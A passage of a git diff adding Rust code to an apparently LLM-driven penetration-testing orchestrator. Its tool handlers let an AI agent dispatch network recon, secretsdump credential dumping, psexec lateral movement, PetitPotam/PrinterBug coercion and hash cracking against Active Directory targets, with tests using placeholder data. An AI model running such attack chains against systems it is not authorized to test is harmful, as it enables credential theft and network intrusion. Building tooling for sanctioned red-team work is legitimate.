+ serde_json::to_string(config.target_ips.first().unwrap_or(&String::new())) + .unwrap_or_default(), + ), + ( + "target_ips", + serde_json::to_string(&config.target_ips.join(",")).unwrap_or_default(), + ), + ]; + + for (field, value) in &fields { + let _: () = conn.hset(&meta_key, *field, value).await?; + } + // 24h TTL + let _: () = conn.expire(&meta_key, 86400).await?; + + // Set active operation pointer for worker discovery + let _: () = conn.set("ares:op:active", &config.operation_id).await?; + + // Write operation status key (matches Python's status tracking) + ares_core::state::set_operation_status(&mut conn, &config.operation_id, "running").await?; + + // Store the LLM model name for worker discovery and recovery + let model_key = format!( + "{}:{}:{}", + ares_core::state::KEY_PREFIX, + config.operation_id, + ares_core::state::KEY_MODEL, + ); + let model_name = std::env::var("ARES_LLM_MODEL").unwrap_or_default(); + if !model_name.is_empty() { + let _: () = conn.set_ex(&model_key, &model_name, 86400u64).await?; + } + + info!( + operation_id = %config.operation_id, + meta_key = %meta_key, + "Operation metadata written to Redis" + ); + Ok(()) +} + +/// Dispatch initial recon tasks for each target IP. +/// +/// This seeds the reactive automation pipeline — without these initial tasks, +/// all automation tasks have nothing to work with on a fresh operation. +pub(crate) async fn dispatch_initial_recon( + dispatcher: &Arc, + config: &OrchestratorConfig, +) -> usize { + let mut count = 0; + let domain = &config.target_domain; + + // Network scan + SMB sweep + SMB signing check per target IP. + // smb_sweep (NetExec) is critical: it discovers hostnames, OS, and DCs + // from SMB banners — data that nmap alone may miss. + for ip in &config.target_ips { + match dispatcher + .request_recon( + ip, + domain, + &["network_scan", "smb_sweep", "smb_signing_check"], + None, + ) + .await + { + Ok(Some(task_id)) => { + info!(task_id = %task_id, ip = %ip, "Dispatched initial recon"); + count += 1; + } + Ok(None) => { + warn!(ip = %ip, "Initial recon throttled/deferred"); + } + Err(e) => { + warn!(ip = %ip, err = %e, "Failed to dispatch initial recon"); + } + } + } + + // User enumeration against all target IPs — we don't know which are DCs yet, + // and non-DC IPs may silently return no output. Null session for bootstrap. + for ip in &config.target_ips { + let payload = serde_json::json!({ + "target_ip": ip, + "domain": domain, + "techniques": ["user_enumeration"], + "null_session": true, + }); + match dispatcher + .throttled_submit("recon", "recon", payload, 5) + .await + { + Ok(Some(task_id)) => { + info!(task_id = %task_id, ip = %ip, "Dispatched user enumeration"); + count += 1; + } + Ok(None) => warn!(ip = %ip, "User enumeration throttled/deferred"), + Err(e) => warn!(ip = %ip, err = %e, "Failed to dispatch user enumeration"), + } + } + + count +} diff --git a/ares-cli/src/orchestrator/callback_handler/dispatch.rs b/ares-cli/src/orchestrator/callback_handler/dispatch.rs new file mode 100644 index 00000000..5384e179 --- /dev/null +++ b/ares-cli/src/orchestrator/callback_handler/dispatch.rs @@ -0,0 +1,251 @@ +//! Dispatch tools — submit sub-tasks via the Dispatcher, and disabled record tools. + +use anyhow::Result; +use tracing::{info, warn}; + +use ares_llm::provider::ToolCall; +use ares_llm::CallbackResult; + +use super::OrchestratorCallbackHandler; + +impl OrchestratorCallbackHandler { + pub(super) async fn dispatch_recon(&self, call: &ToolCall) -> Result { + let dispatcher = self + .dispatcher + .as_ref() + .ok_or_else(|| anyhow::anyhow!("Dispatcher not configured"))?; + + let target_ip = call.arguments["target_ip"].as_str().unwrap_or(""); + let domain = call.arguments["domain"].as_str().unwrap_or(""); + let techniques: Vec<&str> = call.arguments["techniques"] + .as_array() + .map(|arr| arr.iter().filter_map(|v| v.as_str()).collect()) + .unwrap_or_default(); + + let task_id = dispatcher + .request_recon(target_ip, domain, &techniques, None) + .await?; + + info!(target_ip = target_ip, "Dispatched recon task"); + Ok(CallbackResult::Continue(format!( + "Recon task dispatched: {}", + task_id.as_deref().unwrap_or("queued") + ))) + } + + pub(super) async fn dispatch_credential_access( + &self, + call: &ToolCall, + ) -> Result { + let dispatcher = self + .dispatcher + .as_ref() + .ok_or_else(|| anyhow::anyhow!("Dispatcher not configured"))?; + + let technique = call.arguments["technique"] + .as_str() + .unwrap_or("secretsdump"); + let target_ip = call.arguments["target_ip"].as_str().unwrap_or(""); + let domain = call.arguments["domain"].as_str().unwrap_or(""); + let username = call.arguments["username"].as_str().unwrap_or(""); + let password = call.arguments["password"].as_str().unwrap_or(""); + let priority = call.arguments["priority"].as_i64().unwrap_or(5) as i32; + + let cred = ares_core::models::Credential { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + password: password.to_string(), + domain: domain.to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }; + + let task_id = dispatcher + .request_credential_access(technique, target_ip, domain, &cred, priority) + .await?; + + info!( + technique = technique, + target_ip = target_ip, + "Dispatched credential access task" + ); + Ok(CallbackResult::Continue(format!( + "Credential access task ({technique}) dispatched: {}", + task_id.as_deref().unwrap_or("queued") + ))) + } + + pub(super) async fn dispatch_lateral(&self, call: &ToolCall) -> Result { + let dispatcher = self + .dispatcher + .as_ref() + .ok_or_else(|| anyhow::anyhow!("Dispatcher not configured"))?; + + let target_ip = call.arguments["target_ip"].as_str().unwrap_or(""); + let technique = call.arguments["technique"].as_str().unwrap_or("psexec"); + let username = call.arguments["username"].as_str().unwrap_or(""); + let password = call.arguments["password"].as_str().unwrap_or(""); + let domain = call.arguments["domain"].as_str().unwrap_or(""); + + let cred = ares_core::models::Credential { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + password: password.to_string(), + domain: domain.to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }; + + let task_id = dispatcher + .request_lateral(target_ip, &cred, technique) + .await?; + + info!( + technique = technique, + target_ip = target_ip, + "Dispatched lateral movement task" + ); + Ok(CallbackResult::Continue(format!( + "Lateral movement ({technique}) dispatched to {target_ip}: {}", + task_id.as_deref().unwrap_or("queued") + ))) + } + + pub(super) async fn dispatch_exploit(&self, call: &ToolCall) -> Result { + let dispatcher = self + .dispatcher + .as_ref() + .ok_or_else(|| anyhow::anyhow!("Dispatcher not configured"))?; + + let vuln_id = call.arguments["vuln_id"].as_str().unwrap_or(""); + let priority = call.arguments["priority"].as_i64().unwrap_or(3) as i32; + + // Look up vulnerability in state + let state = self.state.read().await; + let vuln = state.discovered_vulnerabilities.get(vuln_id); + + if let Some(vuln) = vuln { + let vuln = vuln.clone(); + drop(state); // Release lock before async dispatch + + let task_id = dispatcher.request_exploit(&vuln, priority).await?; + info!(vuln_id = vuln_id, "Dispatched exploit task"); + Ok(CallbackResult::Continue(format!( + "Exploit task for {} dispatched: {}", + vuln_id, + task_id.as_deref().unwrap_or("queued") + ))) + } else { + drop(state); + Ok(CallbackResult::Continue(format!( + "Vulnerability {vuln_id} not found in discovered vulnerabilities" + ))) + } + } + + pub(super) async fn dispatch_coercion(&self, call: &ToolCall) -> Result { + let dispatcher = self + .dispatcher + .as_ref() + .ok_or_else(|| anyhow::anyhow!("Dispatcher not configured"))?; + + let target_ip = call.arguments["target_ip"].as_str().unwrap_or(""); + let listener_ip = call.arguments["listener_ip"].as_str().unwrap_or(""); + let techniques: Vec<&str> = call.arguments["techniques"] + .as_array() + .map(|arr| arr.iter().filter_map(|v| v.as_str()).collect()) + .unwrap_or_else(|| vec!["petitpotam", "printerbug"]); + + let task_id = dispatcher + .request_coercion(target_ip, listener_ip, &techniques) + .await?; + + info!(target_ip = target_ip, "Dispatched coercion task"); + Ok(CallbackResult::Continue(format!( + "Coercion task dispatched to {target_ip}: {}", + task_id.as_deref().unwrap_or("queued") + ))) + } + + /// record_credential is disabled — credentials come only from tool output parsing. + /// This handler exists as a safety net in case the LLM somehow invokes it. + pub(super) async fn record_credential(&self, _call: &ToolCall) -> Result { + warn!("record_credential called but disabled — credentials are auto-extracted from tool output"); + Ok(CallbackResult::Continue( + "This tool is disabled. Credentials are automatically extracted from tool output. \ + Focus on running tools that produce credential data (secretsdump, lsassy, netexec, etc.) \ + and the system will parse and store credentials automatically." + .to_string(), + )) + } + + /// record_timeline_event is disabled — timeline events are auto-generated from + /// state changes (credential/hash/host discoveries) in result_processing.rs. + /// This handler exists as a safety net in case the LLM somehow invokes it. + pub(super) async fn record_timeline_event(&self, _call: &ToolCall) -> Result { + warn!("record_timeline_event called but disabled — timeline events are auto-generated from discoveries"); + Ok(CallbackResult::Continue( + "This tool is disabled. Timeline events are automatically generated when \ + credentials, hashes, and hosts are discovered from tool output. Focus on \ + running attack tools and the system will build the timeline automatically." + .to_string(), + )) + } + + pub(super) async fn dispatch_crack(&self, call: &ToolCall) -> Result { + let dispatcher = self + .dispatcher + .as_ref() + .ok_or_else(|| anyhow::anyhow!("Dispatcher not configured"))?; + + let hash_value = call.arguments["hash_value"].as_str().unwrap_or(""); + let hash_type = call.arguments["hash_type"].as_str().unwrap_or("ntlm"); + let username = call.arguments["username"].as_str().unwrap_or(""); + let domain = call.arguments["domain"].as_str().unwrap_or(""); + + let hash = ares_core::models::Hash { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + hash_value: hash_value.to_string(), + hash_type: hash_type.to_string(), + domain: domain.to_string(), + cracked_password: None, + source: String::new(), + discovered_at: None, + parent_id: None, + attack_step: 0, + aes_key: None, + }; + + let task_id = dispatcher.request_crack(&hash).await?; + + info!(hash_type = hash_type, "Dispatched crack task"); + Ok(CallbackResult::Continue(format!( + "Crack task dispatched for {username}@{domain} ({hash_type}): {}", + task_id.as_deref().unwrap_or("queued") + ))) + } + + /// report_cracked_credential is disabled — cracked passwords are extracted from + /// hashcat/john stdout via output_extraction.rs parsers. LLMs must never construct + /// credential data directly. + /// This handler exists as a safety net in case the LLM somehow invokes it. + pub(super) async fn report_cracked_credential( + &self, + _call: &ToolCall, + ) -> Result { + warn!("report_cracked_credential called but disabled — cracked passwords are auto-extracted from tool output"); + Ok(CallbackResult::Continue( + "This tool is disabled. Cracked passwords are automatically extracted from \ + hashcat and john output. Run the cracking tools and the system will parse \ + and store cracked credentials automatically." + .to_string(), + )) + } +} diff --git a/ares-cli/src/orchestrator/callback_handler/mod.rs b/ares-cli/src/orchestrator/callback_handler/mod.rs new file mode 100644 index 00000000..76c8a3e9 --- /dev/null +++ b/ares-cli/src/orchestrator/callback_handler/mod.rs @@ -0,0 +1,111 @@ +//! Orchestrator-specific callback handler for state query and dispatch tools. +//! +//! Implements `CallbackHandler` to handle tools that need in-memory state access: +//! +//! **Query tools** — read from SharedState (credentials, hashes, tasks, agent status) +//! **Dispatch tools** — submit sub-tasks via the Dispatcher (recon, credential_access, etc.) +//! +//! These tools are available only to the orchestrator agent role. + +mod dispatch; +mod query; +#[cfg(test)] +mod tests; + +use std::sync::Arc; + +use anyhow::Result; +use tracing::warn; + +use ares_llm::provider::ToolCall; +use ares_llm::{CallbackHandler, CallbackResult}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::SharedState; +use crate::orchestrator::task_queue::TaskQueue; + +/// Callback handler for orchestrator LLM agent tools. +/// +/// Provides direct access to shared state (for query tools) and the dispatcher +/// (for sub-task submission) without going through Redis tool queues. +pub struct OrchestratorCallbackHandler { + pub(super) state: SharedState, + pub(super) dispatcher: Option>, + pub(super) task_queue: Option, +} + +impl OrchestratorCallbackHandler { + pub fn new(state: SharedState, task_queue: TaskQueue) -> Self { + Self { + state, + dispatcher: None, + task_queue: Some(task_queue), + } + } + + #[cfg(test)] + pub fn new_for_test(state: SharedState) -> Self { + Self { + state, + dispatcher: None, + task_queue: None, + } + } + + pub fn with_dispatcher(mut self, dispatcher: Arc) -> Self { + self.dispatcher = Some(dispatcher); + self + } +} + +#[async_trait::async_trait] +impl CallbackHandler for OrchestratorCallbackHandler { + async fn handle_callback(&self, call: &ToolCall) -> Option> { + match call.name.as_str() { + // Query tools + "get_credential_summary" => Some(self.get_credential_summary().await), + "get_hash_summary" => Some(self.get_hash_summary().await), + "get_all_credentials" => Some(self.get_all_credentials(call).await), + "get_all_hashes" => Some(self.get_all_hashes(call).await), + "get_hash_value" => Some(self.get_hash_value(call).await), + "get_pending_tasks" => Some(self.get_pending_tasks().await), + "get_agent_status" => Some(self.get_agent_status().await), + "get_operation_summary" => Some(self.get_operation_summary().await), + // Recording tools — persist to state and Redis + "record_credential" => Some(self.record_credential(call).await), + "record_timeline_event" => Some(self.record_timeline_event(call).await), + // Dispatch tools + "dispatch_recon" => Some(self.dispatch_recon(call).await), + "dispatch_credential_access" => Some(self.dispatch_credential_access(call).await), + "dispatch_lateral_movement" => Some(self.dispatch_lateral(call).await), + "dispatch_privesc_exploit" => Some(self.dispatch_exploit(call).await), + "dispatch_coercion" => Some(self.dispatch_coercion(call).await), + "dispatch_crack" => Some(self.dispatch_crack(call).await), + // Cracker result — persist cracked credential and update hash + "report_cracked_credential" => Some(self.report_cracked_credential(call).await), + // Not ours — let built-in handler take over + _ => None, + } + } + + async fn on_token_usage(&self, usage: &ares_llm::TokenUsage, model: &str) { + if usage.input_tokens == 0 && usage.output_tokens == 0 { + return; + } + if let Some(ref queue) = self.task_queue { + let op_id = self.state.read().await.operation_id.clone(); + let mut conn = queue.connection(); + if let Err(e) = ares_core::token_usage::increment_token_usage( + &mut conn, + &op_id, + usage.input_tokens.into(), + usage.output_tokens.into(), + model, + ) + .await + { + warn!(err = %e, "Failed to record incremental token usage"); + } + } + } +} diff --git a/ares-cli/src/orchestrator/callback_handler/query.rs b/ares-cli/src/orchestrator/callback_handler/query.rs new file mode 100644 index 00000000..acd83112 --- /dev/null +++ b/ares-cli/src/orchestrator/callback_handler/query.rs @@ -0,0 +1,318 @@ +//! Query tools — read from in-memory state. + +use std::collections::HashMap; + +use anyhow::Result; +use serde_json::json; + +use ares_llm::provider::ToolCall; +use ares_llm::CallbackResult; + +use super::OrchestratorCallbackHandler; + +impl OrchestratorCallbackHandler { + pub(super) async fn get_credential_summary(&self) -> Result { + let state = self.state.read().await; + let mut by_domain: HashMap<&str, (usize, usize)> = HashMap::new(); + + for cred in &state.credentials { + let domain = if cred.domain.is_empty() { + "unknown" + } else { + &cred.domain + }; + let entry = by_domain.entry(domain).or_insert((0, 0)); + entry.0 += 1; + if cred.is_admin { + entry.1 += 1; + } + } + + let summary: Vec = by_domain + .iter() + .map(|(domain, (total, admin))| { + json!({ + "domain": domain, + "total": total, + "admin": admin, + }) + }) + .collect(); + + let result = json!({ + "total_credentials": state.credentials.len(), + "by_domain": summary, + "has_domain_admin": state.has_domain_admin, + }); + + Ok(CallbackResult::Continue(serde_json::to_string_pretty( + &result, + )?)) + } + + pub(super) async fn get_hash_summary(&self) -> Result { + let state = self.state.read().await; + let mut by_type: HashMap<&str, (usize, usize)> = HashMap::new(); + + for hash in &state.hashes { + let entry = by_type.entry(&hash.hash_type).or_insert((0, 0)); + entry.0 += 1; + if hash.cracked_password.is_some() { + entry.1 += 1; + } + } + + let summary: Vec = by_type + .iter() + .map(|(hash_type, (total, cracked))| { + json!({ + "hash_type": hash_type, + "total": total, + "cracked": cracked, + "uncracked": total - cracked, + }) + }) + .collect(); + + let result = json!({ + "total_hashes": state.hashes.len(), + "by_type": summary, + }); + + Ok(CallbackResult::Continue(serde_json::to_string_pretty( + &result, + )?)) + } + + pub(super) async fn get_all_credentials(&self, call: &ToolCall) -> Result { + let limit = call.arguments["limit"].as_u64().unwrap_or(30) as usize; + let offset = call.arguments["offset"].as_u64().unwrap_or(0) as usize; + + let state = self.state.read().await; + let total = state.credentials.len(); + let page: Vec = state + .credentials + .iter() + .skip(offset) + .take(limit) + .map(|c| { + json!({ + "username": c.username, + "domain": c.domain, + "has_password": !c.password.is_empty(), + "is_admin": c.is_admin, + "source": c.source, + }) + }) + .collect(); + + let result = json!({ + "credentials": page, + "total": total, + "offset": offset, + "limit": limit, + }); + + Ok(CallbackResult::Continue(serde_json::to_string_pretty( + &result, + )?)) + } + + pub(super) async fn get_all_hashes(&self, call: &ToolCall) -> Result { + let limit = call.arguments["limit"].as_u64().unwrap_or(30) as usize; + let offset = call.arguments["offset"].as_u64().unwrap_or(0) as usize; + + let state = self.state.read().await; + let total = state.hashes.len(); + let page: Vec = state + .hashes + .iter() + .skip(offset) + .take(limit) + .map(|h| { + json!({ + "username": h.username, + "domain": h.domain, + "hash_type": h.hash_type, + "cracked": h.cracked_password.is_some(), + "source": h.source, + // Don't expose raw hash value to LLM — it doesn't need it + "has_aes_key": h.aes_key.is_some(), + }) + }) + .collect(); + + let result = json!({ + "hashes": page, + "total": total, + "offset": offset, + "limit": limit, + }); + + Ok(CallbackResult::Continue(serde_json::to_string_pretty( + &result, + )?)) + } + + pub(super) async fn get_hash_value(&self, call: &ToolCall) -> Result { + let username = call.arguments["username"].as_str().unwrap_or(""); + let domain = call.arguments["domain"].as_str().unwrap_or(""); + let hash_type_filter = call.arguments["hash_type"].as_str(); + + let state = self.state.read().await; + let matches: Vec = state + .hashes + .iter() + .filter(|h| { + h.username.eq_ignore_ascii_case(username) + && (domain.is_empty() || h.domain.eq_ignore_ascii_case(domain)) + && hash_type_filter + .map(|t| h.hash_type.eq_ignore_ascii_case(t)) + .unwrap_or(true) + }) + .map(|h| { + let mut entry = json!({ + "username": h.username, + "domain": h.domain, + "hash_type": h.hash_type, + "hash_value": h.hash_value, + "cracked": h.cracked_password.is_some(), + }); + if let Some(ref aes) = h.aes_key { + entry["aes_key"] = json!(aes); + } + entry + }) + .collect(); + + if matches.is_empty() { + Ok(CallbackResult::Continue(format!( + "No hashes found for {username}@{domain}" + ))) + } else { + Ok(CallbackResult::Continue(serde_json::to_string_pretty( + &matches, + )?)) + } + } + + pub(super) async fn get_pending_tasks(&self) -> Result { + let state = self.state.read().await; + let tasks: Vec = state + .pending_tasks + .values() + .map(|t| { + json!({ + "task_id": t.task_id, + "task_type": t.task_type, + "assigned_agent": t.assigned_agent, + "status": format!("{:?}", t.status), + "created_at": t.created_at.to_rfc3339(), + }) + }) + .collect(); + + let result = json!({ + "pending_tasks": tasks, + "total": tasks.len(), + }); + + Ok(CallbackResult::Continue(serde_json::to_string_pretty( + &result, + )?)) + } + + pub(super) async fn get_agent_status(&self) -> Result { + let task_queue = self + .task_queue + .as_ref() + .ok_or_else(|| anyhow::anyhow!("TaskQueue not configured"))?; + // Read heartbeats from Redis to get agent status (SCAN to avoid blocking) + let mut conn = task_queue.connection(); + let pattern = "ares:heartbeat:*"; + let keys = { + let mut all_keys = Vec::new(); + let mut cursor: u64 = 0; + loop { + let result: Result<(u64, Vec), redis::RedisError> = redis::cmd("SCAN") + .arg(cursor) + .arg("MATCH") + .arg(pattern) + .arg("COUNT") + .arg(100) + .query_async(&mut conn) + .await; + match result { + Ok((next_cursor, keys)) => { + all_keys.extend(keys); + cursor = next_cursor; + if cursor == 0 { + break; + } + } + Err(_) => break, + } + } + all_keys + }; + + let mut agents: Vec = Vec::new(); + for key in &keys { + if let Ok(data) = redis::cmd("GET") + .arg(key) + .query_async::(&mut conn) + .await + { + if let Ok(parsed) = serde_json::from_str::(&data) { + agents.push(parsed); + } + } + } + + let result = json!({ + "agents": agents, + "total": agents.len(), + }); + + Ok(CallbackResult::Continue(serde_json::to_string_pretty( + &result, + )?)) + } + + pub(super) async fn get_operation_summary(&self) -> Result { + let state = self.state.read().await; + + let cracked_count = state + .hashes + .iter() + .filter(|h| h.cracked_password.is_some()) + .count(); + let admin_count = state.credentials.iter().filter(|c| c.is_admin).count(); + + let result = json!({ + "operation_id": state.operation_id, + "target_ips": state.target_ips, + "domains": state.domains, + "has_domain_admin": state.has_domain_admin, + "credentials": { + "total": state.credentials.len(), + "admin": admin_count, + }, + "hashes": { + "total": state.hashes.len(), + "cracked": cracked_count, + "uncracked": state.hashes.len() - cracked_count, + }, + "hosts": state.hosts.len(), + "users": state.users.len(), + "discovered_vulnerabilities": state.discovered_vulnerabilities.len(), + "exploited_vulnerabilities": state.exploited_vulnerabilities.len(), + "pending_tasks": state.pending_tasks.len(), + "completed_tasks": state.completed_tasks.len(), + }); + + Ok(CallbackResult::Continue(serde_json::to_string_pretty( + &result, + )?)) + } +} diff --git a/ares-cli/src/orchestrator/callback_handler/tests.rs b/ares-cli/src/orchestrator/callback_handler/tests.rs new file mode 100644 index 00000000..97c312a4 --- /dev/null +++ b/ares-cli/src/orchestrator/callback_handler/tests.rs @@ -0,0 +1,547 @@ +use super::*; +use serde_json::json; + +use ares_llm::provider::ToolCall; +use ares_llm::CallbackResult; + +use crate::orchestrator::state::SharedState; + +/// Helper to create a credential without Default. +fn make_cred( + username: &str, + password: &str, + domain: &str, + is_admin: bool, +) -> ares_core::models::Credential { + ares_core::models::Credential { + id: uuid::Uuid::new_v4().to_string(), + username: username.into(), + password: password.into(), + domain: domain.into(), + source: String::new(), + discovered_at: None, + is_admin, + parent_id: None, + attack_step: 0, + } +} + +/// Helper to create a hash without Default. +fn make_hash( + username: &str, + domain: &str, + hash_type: &str, + hash_value: &str, + aes_key: Option<&str>, +) -> ares_core::models::Hash { + ares_core::models::Hash { + id: uuid::Uuid::new_v4().to_string(), + username: username.into(), + hash_value: hash_value.into(), + hash_type: hash_type.into(), + domain: domain.into(), + cracked_password: None, + source: String::new(), + discovered_at: None, + parent_id: None, + attack_step: 0, + aes_key: aes_key.map(|s| s.to_string()), + } +} + +fn make_handler() -> OrchestratorCallbackHandler { + OrchestratorCallbackHandler::new_for_test(SharedState::new("test-op".to_string())) +} + +#[tokio::test] +async fn test_credential_summary_empty() { + let handler = make_handler(); + let call = ToolCall { + id: "c1".into(), + name: "get_credential_summary".into(), + arguments: json!({}), + }; + let result = handler.handle_callback(&call).await.unwrap().unwrap(); + match result { + CallbackResult::Continue(msg) => { + let parsed: serde_json::Value = serde_json::from_str(&msg).unwrap(); + assert_eq!(parsed["total_credentials"], 0); + } + other => panic!("Expected Continue, got: {:?}", other), + } +} + +#[tokio::test] +async fn test_credential_summary_with_data() { + let handler = make_handler(); + { + let mut s = handler.state.write().await; + s.credentials + .push(make_cred("admin", "pass", "contoso.local", true)); + s.credentials + .push(make_cred("user1", "pass1", "contoso.local", false)); + } + + let call = ToolCall { + id: "c2".into(), + name: "get_credential_summary".into(), + arguments: json!({}), + }; + let result = handler.handle_callback(&call).await.unwrap().unwrap(); + match result { + CallbackResult::Continue(msg) => { + let parsed: serde_json::Value = serde_json::from_str(&msg).unwrap(); + assert_eq!(parsed["total_credentials"], 2); + } + other => panic!("Expected Continue, got: {:?}", other), + } +} + +#[tokio::test] +async fn test_hash_summary_empty() { + let handler = make_handler(); + let call = ToolCall { + id: "c3".into(), + name: "get_hash_summary".into(), + arguments: json!({}), + }; + let result = handler.handle_callback(&call).await.unwrap().unwrap(); + match result { + CallbackResult::Continue(msg) => { + let parsed: serde_json::Value = serde_json::from_str(&msg).unwrap(); + assert_eq!(parsed["total_hashes"], 0); + } + other => panic!("Expected Continue, got: {:?}", other), + } +} + +#[tokio::test] +async fn test_hash_value_lookup() { + let handler = make_handler(); + { + let mut s = handler.state.write().await; + s.hashes.push(make_hash( + "krbtgt", + "contoso.local", + "NTLM", + "aad3b435b51404ee:313b6f423a71d74c", + Some("f8b6c5e4d3a2b109"), + )); + } + + let call = ToolCall { + id: "c4".into(), + name: "get_hash_value".into(), + arguments: json!({"username": "krbtgt", "domain": "contoso.local"}), + }; + let result = handler.handle_callback(&call).await.unwrap().unwrap(); + match result { + CallbackResult::Continue(msg) => { + assert!(msg.contains("313b6f423a71d74c")); + assert!(msg.contains("f8b6c5e4d3a2b109")); + } + other => panic!("Expected Continue, got: {:?}", other), + } +} + +#[tokio::test] +async fn test_hash_value_not_found() { + let handler = make_handler(); + let call = ToolCall { + id: "c5".into(), + name: "get_hash_value".into(), + arguments: json!({"username": "nobody", "domain": "contoso.local"}), + }; + let result = handler.handle_callback(&call).await.unwrap().unwrap(); + match result { + CallbackResult::Continue(msg) => assert!(msg.contains("No hashes found")), + other => panic!("Expected Continue, got: {:?}", other), + } +} + +#[tokio::test] +async fn test_pending_tasks_empty() { + let handler = make_handler(); + let call = ToolCall { + id: "c6".into(), + name: "get_pending_tasks".into(), + arguments: json!({}), + }; + let result = handler.handle_callback(&call).await.unwrap().unwrap(); + match result { + CallbackResult::Continue(msg) => { + let parsed: serde_json::Value = serde_json::from_str(&msg).unwrap(); + assert_eq!(parsed["total"], 0); + } + other => panic!("Expected Continue, got: {:?}", other), + } +} + +#[tokio::test] +async fn test_unknown_tool_returns_none() { + let handler = make_handler(); + let call = ToolCall { + id: "c7".into(), + name: "nmap_scan".into(), + arguments: json!({}), + }; + assert!(handler.handle_callback(&call).await.is_none()); +} + +#[tokio::test] +async fn test_dispatch_without_dispatcher() { + let handler = make_handler(); + let call = ToolCall { + id: "c8".into(), + name: "dispatch_recon".into(), + arguments: json!({"target_ip": "192.168.58.10"}), + }; + let result = handler.handle_callback(&call).await.unwrap(); + assert!(result.is_err()); // No dispatcher configured +} + +#[tokio::test] +async fn test_operation_summary() { + let handler = make_handler(); + { + let mut s = handler.state.write().await; + s.credentials + .push(make_cred("admin", "pass", "contoso.local", true)); + s.hashes.push(make_hash( + "krbtgt", + "contoso.local", + "NTLM", + "aad3b435:313b6f42", + None, + )); + s.has_domain_admin = true; + } + + let call = ToolCall { + id: "c10".into(), + name: "get_operation_summary".into(), + arguments: json!({}), + }; + let result = handler.handle_callback(&call).await.unwrap().unwrap(); + match result { + CallbackResult::Continue(msg) => { + let parsed: serde_json::Value = serde_json::from_str(&msg).unwrap(); + assert_eq!(parsed["credentials"]["total"], 1); + assert_eq!(parsed["credentials"]["admin"], 1); + assert_eq!(parsed["hashes"]["total"], 1); + assert_eq!(parsed["has_domain_admin"], true); + } + other => panic!("Expected Continue, got: {:?}", other), + } +} + +#[tokio::test] +async fn test_dispatch_crack_without_dispatcher() { + let handler = make_handler(); + let call = ToolCall { + id: "c11".into(), + name: "dispatch_crack".into(), + arguments: json!({"hash_value": "aad3b435:beef", "hash_type": "ntlm"}), + }; + let result = handler.handle_callback(&call).await.unwrap(); + assert!(result.is_err()); // No dispatcher configured +} + +#[tokio::test] +async fn test_all_credentials_pagination() { + let handler = make_handler(); + { + let mut s = handler.state.write().await; + for i in 0..10 { + s.credentials.push(make_cred( + &format!("user{i}"), + "pass", + "contoso.local", + false, + )); + } + } + + let call = ToolCall { + id: "c9".into(), + name: "get_all_credentials".into(), + arguments: json!({"limit": 3, "offset": 2}), + }; + let result = handler.handle_callback(&call).await.unwrap().unwrap(); + match result { + CallbackResult::Continue(msg) => { + let parsed: serde_json::Value = serde_json::from_str(&msg).unwrap(); + assert_eq!(parsed["total"], 10); + assert_eq!(parsed["credentials"].as_array().unwrap().len(), 3); + assert_eq!(parsed["offset"], 2); + } + other => panic!("Expected Continue, got: {:?}", other), + } +} + +#[tokio::test] +async fn test_full_summary_with_populated_state() { + let handler = make_handler(); + { + let mut s = handler.state.write().await; + s.credentials + .push(make_cred("admin", "P@ss1", "contoso.local", true)); + s.credentials + .push(make_cred("user1", "pass1", "contoso.local", false)); + s.credentials + .push(make_cred("svc_sql", "SqlP@ss", "fabrikam.local", false)); + s.hashes.push(make_hash( + "krbtgt", + "contoso.local", + "NTLM", + "aad3b:beef", + None, + )); + let mut h = make_hash("admin", "contoso.local", "NTLM", "aad3b:dead", None); + h.cracked_password = Some("cracked123".into()); + s.hashes.push(h); + s.has_domain_admin = true; + s.domains.push("contoso.local".into()); + s.discovered_vulnerabilities.insert( + "vuln-1".into(), + ares_core::models::VulnerabilityInfo { + vuln_id: "vuln-1".into(), + vuln_type: "constrained_delegation".into(), + target: "192.168.58.30".into(), + discovered_by: "test".into(), + discovered_at: chrono::Utc::now(), + details: { + let mut m = std::collections::HashMap::new(); + m.insert("account".into(), json!("svc_sql")); + m + }, + recommended_agent: String::new(), + priority: 5, + }, + ); + } + + let call = ToolCall { + id: "int-1".into(), + name: "get_operation_summary".into(), + arguments: json!({}), + }; + let result = handler.handle_callback(&call).await.unwrap().unwrap(); + match result { + CallbackResult::Continue(msg) => { + let p: serde_json::Value = serde_json::from_str(&msg).unwrap(); + assert_eq!(p["credentials"]["total"], 3); + assert_eq!(p["credentials"]["admin"], 1); + assert_eq!(p["hashes"]["total"], 2); + assert_eq!(p["hashes"]["cracked"], 1); + assert_eq!(p["has_domain_admin"], true); + assert_eq!(p["discovered_vulnerabilities"], 1); + } + other => panic!("Expected Continue, got: {:?}", other), + } +} + +#[tokio::test] +async fn test_credential_summary_multi_domain() { + let handler = make_handler(); + { + let mut s = handler.state.write().await; + s.credentials + .push(make_cred("admin", "p1", "contoso.local", true)); + s.credentials + .push(make_cred("user1", "p2", "contoso.local", false)); + s.credentials + .push(make_cred("admin2", "p3", "fabrikam.local", true)); + } + + let call = ToolCall { + id: "int-2".into(), + name: "get_credential_summary".into(), + arguments: json!({}), + }; + let result = handler.handle_callback(&call).await.unwrap().unwrap(); + match result { + CallbackResult::Continue(msg) => { + let p: serde_json::Value = serde_json::from_str(&msg).unwrap(); + assert_eq!(p["total_credentials"], 3); + let domains = p["by_domain"].as_array().unwrap(); + assert_eq!(domains.len(), 2); + } + other => panic!("Expected Continue, got: {:?}", other), + } +} + +#[tokio::test] +async fn test_hash_value_case_insensitive_lookup() { + let handler = make_handler(); + { + let mut s = handler.state.write().await; + s.hashes.push(make_hash( + "Administrator", + "CONTOSO.LOCAL", + "NTLM", + "beef:dead", + None, + )); + } + + let call = ToolCall { + id: "int-3".into(), + name: "get_hash_value".into(), + arguments: json!({"username": "administrator", "domain": "contoso.local"}), + }; + let result = handler.handle_callback(&call).await.unwrap().unwrap(); + match result { + CallbackResult::Continue(msg) => assert!(msg.contains("beef:dead")), + other => panic!("Expected Continue, got: {:?}", other), + } +} + +#[tokio::test] +async fn test_hash_value_filter_by_type() { + let handler = make_handler(); + { + let mut s = handler.state.write().await; + s.hashes.push(make_hash( + "admin", + "contoso.local", + "NTLM", + "ntlm_hash", + None, + )); + 